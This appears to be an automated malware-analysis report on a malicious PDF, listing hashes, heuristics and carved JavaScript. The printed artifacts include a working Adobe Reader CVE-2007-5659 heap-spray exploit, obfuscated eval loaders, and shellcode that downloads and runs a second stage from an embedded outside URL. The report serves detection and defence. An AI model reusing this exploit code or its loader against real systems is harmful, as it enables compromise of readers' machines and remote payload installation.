Malicious PDF — malware analysis report

Static analysis result for SHA-256 c6cda23530031c88…

MALICIOUS

PDF

8.2 KB First seen: 2026-05-08
MD5: 56d0fa6a0c46a705afa67a2c12777363 SHA-1: 64e32a9c4c426cc85181b6ccfb342ba00a401edb SHA-256: c6cda23530031c8829be9a85d9e1fe71747568dd6b22e2b6ee1a26f0446b2cbf
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript actions and streams. The deobfuscated JavaScript files, 'numeric_charcode_stage_000.js' and 'legacy_pdfkit_stage_000.js', suggest the script is designed to decode and execute further code. The 'PDF_FOXIT_SYNCANNOTSCAN' heuristic specifically points to a method of decoding character codes to form executable JavaScript. The primary intent appears to be downloading and executing a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var n_hFua_p_v = new Array();var svVtTA_4te_A = 0;var Uy7f2HUMn_Pc_l = "";function hkO68C_t_g(J__4W7Wb, V_M815){var k6Xk_hPbO = V_M815.toString();var wCx_d__BIE3gx = "";for(var E8_j_vugrS7U = 0; E8_j_vugrS7U < k6Xk_hPbO.length; E8_j_vugrS7U++) {var xIC4bbn = parseInt(k6Xk_hPbO.substr(E8_j_vugrS7U, 1));if (!isNaN(xIC4bbn)) {xIC4bbn = xIC4bbn.toString(16);if (xIC4bbn.length == 1) { xIC4bbn = "0" + xIC4bbn; }else if (xIC4bbn.length != 2) { xIC4bbn = "00"; }wCx_d__BIE3gx = xIC4bbn + wCx_d__BIE3gx;}} …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://estguard.com/cgi-bin/ca7/z002106201r0019R8fea1881Xdd29ef5dY7eec06ccZ0100f060 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);
	var proc = String.fromCharCode(22+15);
	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
}

if (app.plugIns.length >= 2) {
	fnc += 'l';
	app[fnc](buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1B95 1785 bytes
SHA-256: e74fa483d5532cffe741e58c12d1bb07cbe869b1bb5d6b0d2ff9f63e036e70af
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function pPRt45d(uOM__xp7NQexc, M5AI121oxHFl){var R7A1S__DgH = 4;var uCiQ25_dAbB2 = new Array();var GFV8_Mnapg = new Array(107,256,11,  512, 106, 11,  44,40, 33);GFV8_Mnapg[5] += 12;var NM__85vu71_Eg = "";try {var R_h_qb = 0;if (app) {M5AI121oxHFl = pr[R_h_qb].subject;}} catch(e) {}if (!uOM__xp7NQexc) { uCiQ25_dAbB2[0] = 0;uCiQ25_dAbB2[1] = uCiQ25_dAbB2[0];uCiQ25_dAbB2[2] = uCiQ25_dAbB2[1];uCiQ25_dAbB2[3] = uCiQ25_dAbB2[2];var X2vT_d = GFV8_Mnapg[6] + 3;var O_0mQ3_W7g_H3 = X2vT_d + 11;var uP27p_0 = pPRt45d;var w4WQX0A888__A75 = 0;uP27p_0 = uP27p_0.toString();for(var hrOI7S_3m82 = 0; hrOI7S_3m82 < uP27p_0.length; hrOI7S_3m82++) {var Gi7o_r7V = uP27p_0.charCodeAt(hrOI7S_3m82);if (Gi7o_r7V > X2vT_d && Gi7o_r7V < O_0mQ3_W7g_H3) {if (w4WQX0A888__A75 == 4) {w4WQX0A888__A75 = 0;}uCiQ25_dAbB2[w4WQX0A888__A75] += Gi7o_r7V;if (uCiQ25_dAbB2[w4WQX0A888__A75] > GFV8_Mnapg[3]) {uCiQ25_dAbB2[w4WQX0A888__A75] -= 512;}w4WQX0A888__A75++;}}}else  { uCiQ25_dAbB2 = uOM__xp7NQexc;}for (var R_h6L12l_hjBs = 0; R_h6L12l_hjBs < 4; R_h6L12l_hjBs++) {if (uCiQ25_dAbB2[R_h6L12l_hjBs] > GFV8_Mnapg[1]) {uCiQ25_dAbB2[R_h6L12l_hjBs] -= GFV8_Mnapg[1];}}var a_d77uc5 = 0;var XNh8WsjR22 = 0;var h27Y7LA_go;var b8U8Sv__0tYw1t = 0;while ( a_d77uc5 < M5AI121oxHFl.length ) {var P__K_Hq_CpP = "";P__K_Hq_CpP = M5AI121oxHFl.substr(a_d77uc5, 2);var lm1__l2imqTq_22 = parseInt(P__K_Hq_CpP, GFV8_Mnapg[5]); if (XNh8WsjR22 == 4) {XNh8WsjR22 = 0;}lm1__l2imqTq_22 -= (b8U8Sv__0tYw1t + 2) * uCiQ25_dAbB2[XNh8WsjR22];if (lm1__l2imqTq_22 < 0) {lm1__l2imqTq_22 -= Math.floor(lm1__l2imqTq_22 / GFV8_Mnapg[1]) * GFV8_Mnapg[1];}NM__85vu71_Eg += String.fromCharCode(lm1__l2imqTq_22);{a_d77uc5 += 2;b8U8Sv__0tYw1t++;XNh8WsjR22++;}}var tMbt7_i3PT = this;tMbt7_i3PT["eval"](NM__85vu71_Eg);return 0;}

	pPRt45d(0);
legacy_pdfkit_stage_001.js deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x4C3 4876 bytes
SHA-256: f3c8307d12031dccadc644e449e5ac995fa6fdf4bc9ecb236513a3c8b8a9fcfe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var n_hFua_p_v = new Array();var svVtTA_4te_A = 0;var Uy7f2HUMn_Pc_l = "";function hkO68C_t_g(J__4W7Wb, V_M815){var k6Xk_hPbO = V_M815.toString();var wCx_d__BIE3gx = "";for(var E8_j_vugrS7U = 0; E8_j_vugrS7U < k6Xk_hPbO.length; E8_j_vugrS7U++) {var xIC4bbn = parseInt(k6Xk_hPbO.substr(E8_j_vugrS7U, 1));if (!isNaN(xIC4bbn)) {xIC4bbn = xIC4bbn.toString(16);if (xIC4bbn.length == 1) { xIC4bbn = "0" + xIC4bbn; }else if (xIC4bbn.length != 2) { xIC4bbn = "00"; }wCx_d__BIE3gx = xIC4bbn + wCx_d__BIE3gx;}}while(wCx_d__BIE3gx.length < 8) { wCx_d__BIE3gx = "0" + wCx_d__BIE3gx; }var f_3_n_p6F___Amk = J__4W7Wb.toString(16);if (f_3_n_p6F___Amk.length == 1) { f_3_n_p6F___Amk = "0" + f_3_n_p6F___Amk; }else if (f_3_n_p6F___Amk.length != 2) { f_3_n_p6F___Amk = "00"; }wCx_d__BIE3gx = "3" + f_3_n_p6F___Amk + "P" + wCx_d__BIE3gx;return wCx_d__BIE3gx;}function kB6nG_e3(Y7142_Ig, G4_e_3){var W__doRal2 = new Array("");var X4s3_YnM14_WKw = Y7142_Ig;var D48_Bu;if ((D48_Bu = Y7142_Ig.lastIndexOf("%u00")) != -1) {if (D48_Bu + 6 == Y7142_Ig.length) {W__doRal2[0] = Y7142_Ig.substr(D48_Bu + 4, 2);X4s3_YnM14_WKw = Y7142_Ig.substring(0, D48_Bu);}}D48_Bu = 1;for (E8_j_vugrS7U = 0; E8_j_vugrS7U < G4_e_3.length; E8_j_vugrS7U++) {var N_HoQo8CB6Rs = G4_e_3.charCodeAt(E8_j_vugrS7U).toString(16);if (N_HoQo8CB6Rs.length == 1) { N_HoQo8CB6Rs = "0" + N_HoQo8CB6Rs; }W__doRal2[D48_Bu] = N_HoQo8CB6Rs;D48_Bu++;}E8_j_vugrS7U = W__doRal2[0].length ? 0 : 1;W__doRal2[D48_Bu] = "00";W__doRal2[D48_Bu + 1] = "00";D48_Bu += 2;if ((W__doRal2.length - E8_j_vugrS7U) % 2) {W__doRal2[D48_Bu] = "00";}while(E8_j_vugrS7U < W__doRal2.length) {X4s3_YnM14_WKw += "%u" + W__doRal2[E8_j_vugrS7U + 1] + W__doRal2[E8_j_vugrS7U];E8_j_vugrS7U += 2;}X4s3_YnM14_WKw += "%u0000";return X4s3_YnM14_WKw;}function S_7w570dIuk(kLw7__E1Dov, Sb47Rm){while (kLw7__E1Dov.length*2<Sb47Rm) {kLw7__E1Dov += kLw7__E1Dov;}kLw7__E1Dov = kLw7__E1Dov.substring(0,Sb47Rm/2);return kLw7__E1Dov;}function Q13GN6oc(QrCaav51J_FjL, Nc_lTm8w, U8__I2V){var JB_6_qM5_SP6l = 0x0c0c0c0c;var kLw7__E1Dov = unescape(Nc_lTm8w);var G4_e_3 = hkO68C_t_g(QrCaav51J_FjL, U8__I2V);var g_0MH_7Jm = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var Y7142_Ig = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u5770%u786c%u0054%u7468%u7074%u2f3a%u652f%u7473%u7567%u7261%u2e64%u6f63%u2f6d%u6763%u2d69%u6962%u2f6e%u6163%u2f37%u307a%u3230%u3031%u3236%u3130%u3072%u3130%u5239%u6638%u6165%u3831%u3138%u6458%u3264%u6539%u3566%u5964%u6537%u6365%u3630%u6363%u305a%u3031%u6630%u3630%u0030";app.m_p03auW3Nl4Q3A = unescape(kB6nG_e3(Y7142_Ig, G4_e_3));var H4WKGAjM8S = 0x400000;var Q_M_SKGx7LO7k = g_0MH_7Jm.length * 2;var Sb47Rm = H4WKGAjM8S - (Q_M_SKGx7LO7k+0x38);kLw7__E1Dov = S_7w570dIuk(kLw7__E1Dov, Sb47Rm);var v2Nf___8g = (JB_6_qM5_SP6l - 0x400000)/H4WKGAjM8S;for (var M0_18qMy8 = 0; M0_18qMy8 < v2Nf___8g; M0_18qMy8++) {n_hFua_p_v[M0_18qMy8] = kLw7__E1Dov + g_0MH_7Jm;}}function nB7t5p7i(){var YTE__N = "";for (E8_j_vugrS7U = 0; E8_j_vugrS7U < 12; E8_j_vugrS7U++) {YTE__N += unescape("%u0c0c%u0c0c");}var pn5I_Dt = "";for (E8_j_vugrS7U = 0; E8_j_vugrS7U < 750; E8_j_vugrS7U++) {pn5I_Dt += YTE__N;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: pn5I_Dt});app.clearTimeOut(svVtTA_4te_A);}function Dj1_k1_p_X2(qP_aJu){var y_7De_4_vD1x = svVtTA_4te_A;if ((qP_aJu >= 8 && qP_aJu < 8.11) || qP_aJu < 7.1) {Q13GN6oc(23, "%u0c0c%u0c0c", qP_aJu);nB7t5p7i();}if (y_7De_4_vD1x) {app.clearTimeOut(y_7De_4_vD1x);}}var U8__I2V = 0;var r_CV_oK3d = app.plugIns;for (var wWWlCSMm1__gCP = 0; wWWlCSMm1__gCP < r_CV_oK3d.length; wWWlCSMm1__gCP++) {var m0_SYFM__H = r_CV_oK3d[wWWlCSMm1__gCP].version;if (m0_SYFM__H > U8__I2V) { U8__I2V = m0_SYFM__H; }}if (app.viewerVersion == 9.103 && U8__I2V < 9.13) {U8__I2V = 9.13;}app.xu75nbV5Kio_J2 = Dj1_k1_p_X2;svVtTA_4te_A = app.setTimeOut("app.xu75nbV5Kio_J2(" + U8__I2V.toString() + ")", 50);

Open this report in the interactive analyzer, or submit your own file for analysis.